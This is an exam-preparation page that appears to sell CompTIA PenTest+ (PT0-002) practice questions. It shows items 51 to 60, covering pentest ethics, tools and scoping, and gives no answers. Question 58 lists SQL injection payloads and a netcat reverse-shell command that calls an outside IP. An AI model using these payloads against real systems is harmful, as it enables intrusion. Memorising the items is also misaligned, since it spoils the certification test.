Summer Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CompTIA PenTest+ Certification Exam

Last Update 15 hours ago Total Questions : 464

The CompTIA PenTest+ Certification Exam content is now fully updated, with all current exam questions added 15 hours ago. Deciding to include PT0-002 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our PT0-002 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these PT0-002 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CompTIA PenTest+ Certification Exam practice test comfortably within the allotted time.

Question # 51

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

A.

OWASP Top 10

B.

MITRE ATT & CK

C.

Cyber Kill Chain

D.

Well-Architected Framework

Question # 52

A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?

A.

Contact the high-profile celebrities.

B.

Delete the high-profile accounts.

C.

Immediately contact the client.

D.

Record the findings in the penetration test report.

Question # 53

During an assessment, a penetration tester needs to perform a cloud asset discovery of an organization. Which of the following tools would most likely provide more accurate results in this situation?

A.

Pacu

B.

Scout Suite

C.

Shodan

D.

TruffleHog

Question # 54

For an engagement, a penetration tester is required to use only local operating system tools for file transfer. Which of the following options should the penetration tester consider?

A.

Netcat

B.

WinSCP

C.

Filezilla

D.

Netstat

Question # 55

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

A.

Bluejacking

B.

Bluesnarfing

C.

BLE attack

D.

WPS PIN attack

Question # 56

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

A.

To maintain confidentiality of data/information

B.

To avoid disclosure of how the hashes were obtained

C.

To make the hashes appear shorter and easier to crack

D.

To prevent analysis based on the type of hash

Question # 57

Which of the following factors would a penetration tester most likely consider when testing at a location?

A.

Determine if visas are required.

B.

Ensure all testers can access all sites.

C.

Verify the tools being used are legal for use at all sites.

D.

Establish the time of the day when a test can occur.

Question # 58

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY ' 00:00:05 '

Which of the following should the penetration tester attempt NEXT?

A.

http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell ' whoami '

B.

http://company.com/catalog.asp?productid=22 ' OR 1=1 --

C.

http://company.com/catalog.asp?productid=22 ' UNION SELECT 1,2,3 --

D.

http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Question # 59

A security firm is discussing the results of a penetration test with a client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following best describes the action taking place?

A.

Maximizing the likelihood of finding vulnerabilities

B.

Reprioritizing the goals/objectives

C.

Eliminating the potential for false positives

D.

Reducing the risk to the client environment

Question # 60

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = ‘123’ hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?

A.

Changing passwords that were created before this code update

B.

Keeping hashes created by both methods for compatibility

C.

Rehashing all old passwords with the new code

D.

Replacing the SHA-256 algorithm to something more secure

Go to page: